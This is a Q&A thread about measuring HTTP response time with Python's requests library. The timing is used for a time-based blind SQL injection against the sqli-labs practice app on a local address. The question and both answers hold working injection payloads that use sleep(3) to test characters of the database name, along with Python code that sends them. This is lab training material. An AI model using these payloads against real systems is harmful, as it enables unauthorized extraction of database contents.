# Measuring the HTTP response time with requests library in Python. Am I doing it right?

Tags: python-2.7, python-requests, httpresponse, roundtrip, elapsed

I am trying to induce an artificial delay in the HTTP response from a web application (This is a technique used to do blind SQL Injections). If the below HTTP request is sent from a browser, response from the web server comes back after 3 seconds(caused by sleep(3)):

```
http://192.168.2.15/sqli-labs/Less-9/?id=1'+and+if+(ascii(substr(database(),+1,+1))=115,sleep(3),null)+--+
```

I am trying to do the same in Python 2.7 using the requests library. The code I have is:

```
import requests

payload = {"id": "1' and if (ascii(substr(database(), 1, 1))=115,sleep(3),null) --+"}
r = requests.get('http://192.168.2.15/sqli-labs/Less-9', params=payload)
roundtrip = r.elapsed.total_seconds()
print roundtrip
```

I expected the roundtrip to be 3 seconds, but instead I get values 0.001371, 0.001616, 0.002228, etc. Am I not using the elapsed attribute properly?

Answer (score 26):

[elapsed](https://requests.readthedocs.io/en/latest/api/#requests.Response.elapsed) measures the time between sending the request and finishing parsing the response *headers*, not until the full response has been transferred.

If you want to measure that time, you need to measure it yourself:

```
import requests
import time

payload = {"id": "1' and if (ascii(substr(database(), 1, 1))=115,sleep(3),null) --+"}
start = time.time()
r = requests.get('http://192.168.2.15/sqli-labs/Less-9', params=payload)
roundtrip = time.time() - start
print roundtrip
```

Comment: Correct me if I'm wrong: `requests.get` is a blocking call, so having `r.content` is not really necessary to "wait until full content has been transferred"

Comment: @dv3, yes, you're right, unless you use `stream=True` (default is `False`) the content will be downloaded immediately, otherwise `get()` returns when when the headers have been received.

Answer (score 0):

I figured out that my payload should have been

`payload = {"id": "1' and if (ascii(substr(database(), 1, 1))=115,sleep(3),null) -- "}`

The last character '+' in the original payload is getting passed to the back end database, which results in an invalid SQL syntax. I shouldn't have done any manual encoding in the payload.